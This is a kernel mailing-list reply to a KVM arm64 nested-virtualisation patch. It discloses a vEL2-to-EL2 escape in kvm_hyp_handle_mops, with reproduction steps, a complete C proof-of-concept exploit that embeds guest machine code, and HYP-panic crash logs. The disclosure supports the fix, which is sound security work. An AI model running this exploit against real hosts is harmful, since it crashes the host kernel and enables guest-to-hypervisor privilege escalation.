From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on aws-us-west-2-korg-lkml-1.web.codeaurora.org Received: from bombadil.infradead.org (bombadil.infradead.org [198.137.202.133]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by smtp.lore.kernel.org (Postfix) with ESMTPS id 3C9A0CD98E6 for ; Tue, 16 Jun 2026 12:04:14 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=lists.infradead.org; s=bombadil.20210309; h=Sender:List-Subscribe:List-Help :List-Post:List-Archive:List-Unsubscribe:List-Id:In-Reply-To: Content-Transfer-Encoding:Content-Type:MIME-Version:References:Message-ID: Subject:Cc:To:From:Date:Reply-To:Content-ID:Content-Description:Resent-Date: Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:List-Owner; bh=VN4rcVxHwaMPeVI5r4eND2uMdyXiyGW/cGbEqWQryP0=; b=PTybz8wcU+bPz+fBofaUSObayR T4sadqIF6ojskb2DtXWBSqRiLlnIzJWBC9rzbs+G4WxmiP1TLCMFQCY1VWB8tW0BL+/WQaIApL1if YRBOrGs9PUeXrtFEueWyEZVGSop68yZett3s6CZ2Jxt7oaARGxC+AvFV4XO40/uszEfigIluCy6nc cgxM8A7ix+RR5XqwSgtZcSG3lqKeLx29gUWMvKXkVMwzp+UmeYG7u9b1oiEC/reBnKDaqgyyjRVwY lB7R9pCYGHv1kHg6NyouwQoLrDuk1NsTFLBw+mfRvm8w4Tln8B+Dctiy3lURLA+y7Y1SY0JCzzSU+ 4ls2tfbg==; Received: from localhost ([::1] helo=bombadil.infradead.org) by bombadil.infradead.org with esmtp (Exim 4.99.1 #2 (Red Hat Linux)) id 1wZSWV-0000000Fjg9-3yF7; Tue, 16 Jun 2026 12:04:08 +0000 Received: from mail-pl1-x630.google.com ([2607:f8b0:4864:20::630]) by bombadil.infradead.org with esmtps (Exim 4.99.1 #2 (Red Hat Linux)) id 1wZSWS-0000000FjfF-37Rm for linux-arm-kernel@lists.infradead.org; Tue, 16 Jun 2026 12:04:06 +0000 Received: by mail-pl1-x630.google.com with SMTP id d9443c01a7336-2c0c379e8ffso30214015ad.3 for ; Tue, 16 Jun 2026 05:04:04 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20251104; t=1781611444; x=1782216244; darn=lists.infradead.org; h=in-reply-to:content-transfer-encoding:content-disposition :mime-version:references:message-id:subject:cc:to:from:date:from:to :cc:subject:date:message-id:reply-to; bh=VN4rcVxHwaMPeVI5r4eND2uMdyXiyGW/cGbEqWQryP0=; b=GV6yjQPZrZkLRFd6uZMb2vfFw49RuJcOareIVmbHe1e3dlSVPPoiQ/RQ+UMSJjJTh0 t4JY7KxERBlHT4/yLn79tphaF/2Neq3OIZxkmx74bxqGe01WdeC104GDwbB5gguhfaQ3 QxMR5kLG+/MDznXC1bAlp/sbxkILk39NnV7ioxni6rVi8FSvWoM7GNB3bQFZm/ySNeOa s8e3v8heaXFY7qYBSJuNZUGPKQAZHeEbD84GJYYUxjqb6gEAOd8NCLBvZOe/O7FWuBih 5YROGjLC8BJ6uGkZ5TdzQa1LiWH2ZCTVbXvYPrzjIF7MIoYEEvvewXLsk+anK1cXF+c6 xRxw== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1781611444; x=1782216244; h=in-reply-to:content-transfer-encoding:content-disposition :mime-version:references:message-id:subject:cc:to:from:date:x-gm-gg :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to; bh=VN4rcVxHwaMPeVI5r4eND2uMdyXiyGW/cGbEqWQryP0=; b=n2nLKNfmBH3ag4aznJrSKGMzutB8MgU+aNh70npXHAjo6yjVj1y4injWMqcqMG3uSW N1Yque9ojFF4H8Z5JNr+pDC+qf+BQToeIwViwsL5brBdmD3i6W6VlwXYmGkHQ5xw4X/q DX2hZZRexTPxSnfBku572LmvABIHTE2aaQAuEFc7FWwvR11Aev44WOFOnin7wJCRfdPR y+/x+PihX2geLk8Qqfajunb4agifUyx5F/QTv7YEp/sM8dHK+WrVi8lrd78llaII5eqq jZ2OsVG/EH1wLiMFUritQpxACXETwKenPQSPdkKy3MwjpHesswXBSqPrjysZ89bjxbd7 Xo5A== X-Forwarded-Encrypted: i=1; AFNElJ90v1fU4wz2HKkTN7GEPAeKbuwIfIBQ/P9WToSnfavuxAQdt3pm95eHs4tQxcY+odK71sHXYhhs019CPtKSoV9V@lists.infradead.org X-Gm-Message-State: AOJu0YxeuGUeApIvucY8zR+kb2Jgv2FLLFwCxZI9tcERyFoAVg7ymIzc VlBILAyVbajs4itm3IoMzJ3oB4OLfT/6/q9N/X9jmIzVInA3pzSCSRwg X-Gm-Gg: Acq92OHqHdPeQVosHs+9fhVpo5QBLEhDOvm7LIQiQfIQBcE4+G+tli3ZassJ7KwUrHQ OSJXzZu0zLLXOtsfJ8eilqgUK0w67UzPck62Df2M9rQF0Ld73prBshmoHk89lUlMW7npw5P86qU jkj1DQGIxR9ju9536UHUrfFvA2/FkjFZ7UuC5WN+CvAx3PrDZ87PVqIpYasfIvcoC6Vu41w2Wi/ NWR27aFbRgdmCbKTT+unNsSd7CIoo+7H7K8e2UHjLONV0EA2ysImYIowINUnypa4VFIGHezoZcu MBNeWBP4cz3ru5IgJSHq69hPtvJv+6cAjt53MhbpmDa9ln3K4lfG2H2NQhWZ6fySRFc6B1YeuUX jrHOB1h/vqBonsW/B33oZcugqwAAPZK7Cykh/D38T/tV1Uwjdy06ixzTy8dhSxdsKtL6RlMJ8Em KLjF/gZCEOewd8C7tCwuI83tNhnpzaXCHXAIn+KitMDd9RjhkKUK0= X-Received: by 2002:a17:902:f543:b0:2be:3850:297e with SMTP id d9443c01a7336-2c664216d17mr158438325ad.31.1781611443525; Tue, 16 Jun 2026 05:04:03 -0700 (PDT) Received: from Air.local ([198.176.50.157]) by smtp.gmail.com with ESMTPSA id d9443c01a7336-2c4328a4c1fsm131590165ad.53.2026.06.16.05.03.58 (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256); Tue, 16 Jun 2026 05:04:02 -0700 (PDT) Date: Tue, 16 Jun 2026 20:03:55 +0800 From: Weiming Shi To: Marc Zyngier , Oliver Upton , Catalin Marinas , Will Deacon Cc: Joey Gouly , Steffen Eiden , Suzuki K Poulose , Zenghui Yu , Andrew Morton , Jakub Kicinski , Bjorn Andersson , Mark Rutland , Kristina Martsenko , linux-arm-kernel@lists.infradead.org, kvmarm@lists.linux.dev, Zhong Wang , Xuanqing Shi Subject: Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Message-ID: References: <20260616114943.81188-2-bestswngs@gmail.com> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <20260616114943.81188-2-bestswngs@gmail.com> X-CRM114-Version: 20100106-BlameMichelson ( TRE 0.9.0 (BSD) ) MR-646709E3 X-CRM114-CacheID: sfid-20260616_050405_042140_B9A8B609 X-CRM114-Status: GOOD ( 13.60 ) X-BeenThere: linux-arm-kernel@lists.infradead.org X-Mailman-Version: 2.1.34 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Sender: "linux-arm-kernel" Errors-To: linux-arm-kernel-bounces+linux-arm-kernel=archiver.kernel.org@lists.infradead.org Reproduction Steps: 1. prepare arm64 kernel image ``` make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig ./scripts/config -e VIRTUALIZATION -e KVM make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j$(nproc) Image make ARCH=arm64 headers_install INSTALL_HDR_PATH=/tmp/khdr ``` 2. prepare qemu + initramfs 3. boot qemu with the kernel iamge ``` qemu-system-aarch64 \ -machine virt,virtualization=on,gic-version=3 -cpu max -accel tcg \ -smp 2 -m 2G -kernel arch/arm64/boot/Image -initrd initramfs.cpio.gz \ -append "console=ttyAMA0 kvm-arm.mode=nested rdinit=/init panic=-1 oops=panic" \ -nographic -no-reboot ``` PoC: ``` /* * PoC: kvm_hyp_handle_mops SPSR_EL2 privilege escalation (EL1 -> EL2) * * Demonstrates that kvm_hyp_handle_mops writes un-translated PSR_MODE_EL2h * into hardware SPSR_EL2 on the fast-reentry path, allowing a nested guest * to escape to real EL2 after an EC_MOPS trap. * * Build: aarch64-linux-gnu-gcc -static -O0 -o poc_mops poc_mops_clean.c * Run: sudo ./poc_mops * * Expected result on vulnerable kernel: HYP panic with PS:00000009 (EL2h) */ #include #include #include #include #include #include #include #include #include #include #define KVM_ARM_VCPU_HAS_EL2 7 #define PSR_MODE_EL1h 0x00000005 #define PSR_MODE_EL2h 0x00000009 #define ARM64_CORE_REG(u32_off) (0x6030000000100000ULL | (uint64_t)(u32_off)) #define REG_X(n) ARM64_CORE_REG((n) * 2) #define REG_SP ARM64_CORE_REG(62) #define REG_PC ARM64_CORE_REG(64) #define REG_PSTATE ARM64_CORE_REG(66) #define GUEST_MEM_SIZE (64 * 1024 * 1024) #define GUEST_CODE_ADDR 0x40000000ULL #define GUEST_STACK_TOP (GUEST_CODE_ADDR + GUEST_MEM_SIZE - 0x1000) #define MMIO_ADDR 0x10000000ULL static int kvm_set_one_reg(int fd, uint64_t id, uint64_t val) { struct kvm_one_reg r = { .id = id, .addr = (uint64_t)&val }; return ioctl(fd, KVM_SET_ONE_REG, &r); } static int kvm_get_one_reg(int fd, uint64_t id, uint64_t *val) { struct kvm_one_reg r = { .id = id, .addr = (uint64_t)val }; return ioctl(fd, KVM_GET_ONE_REG, &r); } static void die(const char *msg) { perror(msg); exit(1); } /* * Guest code (runs at virtual EL2h). * * Triggers EC_MOPS by executing CPYP (prologue, large size so it doesn't * complete in prologue phase) followed immediately by CPYE (epilogue). * The CPU detects PSTATE.MOPS_STATE mismatch and traps. * * kvm_hyp_handle_mops resets PC -= 8 (for epilogue) and writes vcpu_cpsr * (which contains EL2h after fixup_guest_exit reverse translation) directly * to HW SPSR_EL2 without forward translation. On eret, the CPU enters * real EL2h at the guest PC, causing an instruction abort (no EL2 mapping * for guest addresses) -> HYP panic. * * Layout (offsets from GUEST_CODE_ADDR): * +0x00 setup x0,x1,x2,x3 * +0x10 movz x9, #0 * +0x14 mrs x10, CurrentEL ; record EL before * +0x18 str x10, [x3] ; MMIO exit #1 * +0x1C b +16 ; jump to cpyp at +0x2C * +0x20 nop * +0x24 nop * +0x28 mrs x11, CurrentEL ; <-- RESET LANDS HERE (0x30-8) * +0x2C cpyp [x0]!, [x1]!, x2! * +0x30 cpye [x0]!, [x1]!, x2! ; EC_MOPS trap * +0x34 str x11, [x3] ; MMIO exit #2 (after 2nd pass) * +0x38 b . ; done */ static const uint32_t guest_code[] = { 0xd2a80200, /* +0x00 movz x0, #0x4010, lsl #16 (dest = 0x40100000) */ 0xd2a80401, /* +0x04 movz x1, #0x4020, lsl #16 (src = 0x40200000) */ 0xd2a00202, /* +0x08 movz x2, #0x10, lsl #16 (size = 1MB) */ 0xd2a20003, /* +0x0C movz x3, #0x1000, lsl #16 (MMIO = 0x10000000) */ 0xd2800009, /* +0x10 movz x9, #0 */ 0xd538424a, /* +0x14 mrs x10, CurrentEL */ 0xf900006a, /* +0x18 str x10, [x3] */ 0x14000004, /* +0x1C b +16 -> +0x2C */ 0xd503201f, /* +0x20 nop */ 0xd503201f, /* +0x24 nop */ 0xd538424b, /* +0x28 mrs x11, CurrentEL (AFTER eret) */ 0x1d010440, /* +0x2C cpyp [x0]!, [x1]!, x2! */ 0x1d810440, /* +0x30 cpye [x0]!, [x1]!, x2! -> EC_MOPS */ 0xf900006b, /* +0x34 str x11, [x3] */ 0x14000000, /* +0x38 b . */ }; int main(void) { int kvm_fd, vm_fd, vcpu_fd, ret; struct kvm_vcpu_init vcpu_init = {}; struct kvm_run *run; void *guest_mem; setbuf(stdout, NULL); setbuf(stderr, NULL); printf("[*] kvm_hyp_handle_mops SPSR privilege escalation PoC\n"); printf("[*] Target: Linux kernel with CONFIG_KVM_ARM_NV + FEAT_MOPS\n\n"); kvm_fd = open("/dev/kvm", O_RDWR); if (kvm_fd < 0) die("open /dev/kvm"); vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0); if (vm_fd < 0) die("KVM_CREATE_VM"); /* Guest memory */ guest_mem = mmap(NULL, GUEST_MEM_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (guest_mem == MAP_FAILED) die("mmap"); struct kvm_userspace_memory_region region = { .slot = 0, .guest_phys_addr = GUEST_CODE_ADDR, .memory_size = GUEST_MEM_SIZE, .userspace_addr = (uint64_t)guest_mem, }; if (ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, ®ion) < 0) die("KVM_SET_USER_MEMORY_REGION"); memcpy(guest_mem, guest_code, sizeof(guest_code)); /* Create vCPU with nested virtualization */ vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0); if (vcpu_fd < 0) die("KVM_CREATE_VCPU"); if (ioctl(vm_fd, KVM_ARM_PREFERRED_TARGET, &vcpu_init) < 0) die("KVM_ARM_PREFERRED_TARGET"); vcpu_init.features[0] |= (1 << KVM_ARM_VCPU_HAS_EL2); if (ioctl(vcpu_fd, KVM_ARM_VCPU_INIT, &vcpu_init) < 0) { perror("KVM_ARM_VCPU_INIT with HAS_EL2"); printf("[-] Nested virtualization not supported.\n"); return 1; } printf("[+] vCPU created with nested virt (NV)\n"); /* GICv3 (required before KVM_RUN) */ { struct kvm_create_device gic_dev = { .type = KVM_DEV_TYPE_ARM_VGIC_V3 }; if (ioctl(vm_fd, KVM_CREATE_DEVICE, &gic_dev) < 0) die("KVM_CREATE_DEVICE GICv3"); uint64_t dist = 0x08000000ULL, redist = 0x080A0000ULL; struct kvm_device_attr attr = { .group = KVM_DEV_ARM_VGIC_GRP_ADDR, .attr = KVM_VGIC_V3_ADDR_TYPE_DIST, .addr = (uint64_t)&dist, }; ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr); attr.attr = KVM_VGIC_V3_ADDR_TYPE_REDIST; attr.addr = (uint64_t)&redist; ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr); attr = (struct kvm_device_attr){ .group = KVM_DEV_ARM_VGIC_GRP_CTRL, .attr = KVM_DEV_ARM_VGIC_CTRL_INIT, }; ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr); printf("[+] GICv3 initialized\n"); } /* Set vCPU state: start at virtual EL2h */ kvm_set_one_reg(vcpu_fd, REG_PC, GUEST_CODE_ADDR); kvm_set_one_reg(vcpu_fd, REG_SP, GUEST_STACK_TOP); if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL2h) < 0) { printf("[!] Cannot set EL2h, falling back to EL1h\n"); kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL1h); } printf("[+] vCPU: PC=0x%llx PSTATE=EL2h SP=0x%llx\n", (unsigned long long)GUEST_CODE_ADDR, (unsigned long long)GUEST_STACK_TOP); /* Map kvm_run */ int run_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0); run = mmap(NULL, run_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpu_fd, 0); if (run == MAP_FAILED) die("mmap vcpu"); /* Execute guest */ printf("\n[*] Running guest. If kernel panics -> vulnerability confirmed.\n\n"); int mmio_count = 0; uint64_t el_before = 0, el_after = 0; for (int i = 0; i < 100; i++) { ret = ioctl(vcpu_fd, KVM_RUN, 0); if (ret < 0) { printf("[-] KVM_RUN failed: %s (errno=%d)\n", strerror(errno), errno); break; } switch (run->exit_reason) { case KVM_EXIT_MMIO: if (run->mmio.is_write && run->mmio.phys_addr == MMIO_ADDR) { uint64_t val = 0; memcpy(&val, run->mmio.data, run->mmio.len); mmio_count++; printf("[+] MMIO #%d: CurrentEL = 0x%llx (EL%lld)\n", mmio_count, (unsigned long long)val, (long long)(val >> 2) & 3); if (mmio_count == 1) el_before = (val >> 2) & 3; if (mmio_count == 2) { el_after = (val >> 2) & 3; goto results; } } break; case KVM_EXIT_INTERNAL_ERROR: printf("[!] INTERNAL_ERROR: safety assert may have caught EL2h SPSR\n"); goto done; case KVM_EXIT_FAIL_ENTRY: printf("[-] FAIL_ENTRY: 0x%llx\n", (unsigned long long)run->fail_entry.hardware_entry_failure_reason); goto done; default: printf("[*] exit_reason=%d (iter %d)\n", run->exit_reason, i); break; } } printf("[-] Max iterations reached without result.\n"); goto done; results: printf("\n========== RESULTS ==========\n"); printf(" EL before MOPS: EL%lld\n", (long long)el_before); printf(" EL after MOPS: EL%lld\n", (long long)el_after); printf("=============================\n\n"); if (el_after > el_before) printf("[!!!] PRIVILEGE ESCALATION: EL%lld -> EL%lld\n", (long long)el_before, (long long)el_after); else printf("[+] No escalation observed in guest registers.\n"); done: printf("\n[*] Check dmesg for HYP panic:\n"); printf(" dmesg | grep -i 'hyp panic\\|PS:.*0009'\n"); printf("[*] If PS:00000009 appears -> SPSR contained EL2h -> vuln confirmed.\n"); close(vcpu_fd); close(vm_fd); close(kvm_fd); munmap(guest_mem, GUEST_MEM_SIZE); munmap(run, run_size); return 0; } ``` crash log ``` ========== FatalMOPS dynamic test (L1 host) ========== [*] CPU ID registers (FEAT_MOPS bits[19:16] of isar2; FEAT_NV bits[27:24] of mmfr2): /sys/devices/system/cpu/cpu0/regs/identification/id_aa64isar2_el1: (absent) /sys/devices/system/cpu/cpu0/regs/identification/id_aa64mmfr2_el1: (absent) [+] /dev/kvm present [*] dmesg nested-virt lines: [*] launching /poc ... [*] FatalMOPS PoC: kvm_hyp_handle_mops vEL2->EL2 escape [+] vCPU created with nested virt (HAS_EL2) [+] GICv3 initialized [+] vCPU starts at virtual EL2h [*] Running guest. Vulnerable kernel -> HYP panic expected. [+] MMIO #1: CurrentEL=EL2 [ 3.326956] Kernel panic - not syncing: HYP panic: [ 3.326956] PS:00000009 PC:0000000040000028 ESR:86000005 [ 3.326956] FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de [ 3.326956] VCPU:000000006f4e5727 [ 3.342728] CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT [ 3.349460] Hardware name: linux,dummy-virt (DT) [ 3.353136] Call trace: [ 3.355241] show_stack+0x18/0x24 (C) [ 3.358652] dump_stack_lvl+0x34/0x8c [ 3.361515] dump_stack+0x18/0x24 [ 3.364085] vpanic+0x47c/0x4dc [ 3.366527] do_panic_on_target_cpu+0x0/0x1c [ 3.369782] kvm_unexpected_el2_exception+0x0/0x3c0 [ 3.373494] hyp_panic+0x0/0x80 [ 3.375940] kvm_arm_vcpu_enter_exit+0x64/0x94 [ 3.379372] kvm_arch_vcpu_ioctl_run+0x27c/0x8f8 [ 3.382919] kvm_vcpu_ioctl+0x174/0xa38 [ 3.385894] __arm64_sys_ioctl+0xac/0x104 [ 3.389105] invoke_syscall+0x54/0x10c [ 3.392015] el0_svc_common.constprop.0+0x40/0xe0 [ 3.395653] do_el0_svc+0x1c/0x28 [ 3.398236] el0_svc+0x38/0x11c [ 3.400681] el0t_64_sync_handler+0xa0/0xe4 [ 3.403872] el0t_64_sync+0x198/0x19c [ 3.407083] SMP: stopping secondary CPUs [ 3.410661] Kernel Offset: 0x127592c00000 from 0xffff800080000000 [ 3.415585] PHYS_OFFSET: 0x40000000 [ 3.418668] CPU features: 0x00000000,0034e00b,ffeec7e1,9d7e7f3f [ 3.423170] Memory Limit: none ``` after decode ``` Kernel panic - not syncing: HYP panic: PS:00000009 PC:0000000040000028 ESR:86000005 FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de VCPU:000000006f4e5727 CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT Call trace: show_stack (arch/arm64/kernel/stacktrace.c:499) dump_stack_lvl (lib/dump_stack.c:94 120) dump_stack (lib/dump_stack.c:129) vpanic (kernel/panic.c:650) do_panic_on_target_cpu (kernel/panic.c:341) kvm_unexpected_el2_exception (arch/arm64/kvm/hyp/include/hyp/switch.h:964 → arch/arm64/kvm/hyp/vhe/switch.c:688) hyp_panic (arch/arm64/kvm/hyp/vhe/switch.c:678) kvm_arm_vcpu_enter_exit (arch/arm64/kvm/arm.c:1227) kvm_arch_vcpu_ioctl_run (arch/arm64/kvm/arm.c:1324) kvm_vcpu_ioctl (virt/kvm/kvm_main.c:4470) __arm64_sys_ioctl (fs/ioctl.c:51 597 583) invoke_syscall (arch/arm64/kernel/syscall.c:35 49) el0_svc_common.constprop.0 (arch/arm64/kernel/syscall.c:121) do_el0_svc (arch/arm64/kernel/syscall.c:140) el0_svc (arch/arm64/kernel/entry-common.c:740) el0t_64_sync_handler (arch/arm64/kernel/entry-common.c:759) el0t_64_sync (arch/arm64/kernel/entry.S:594) ```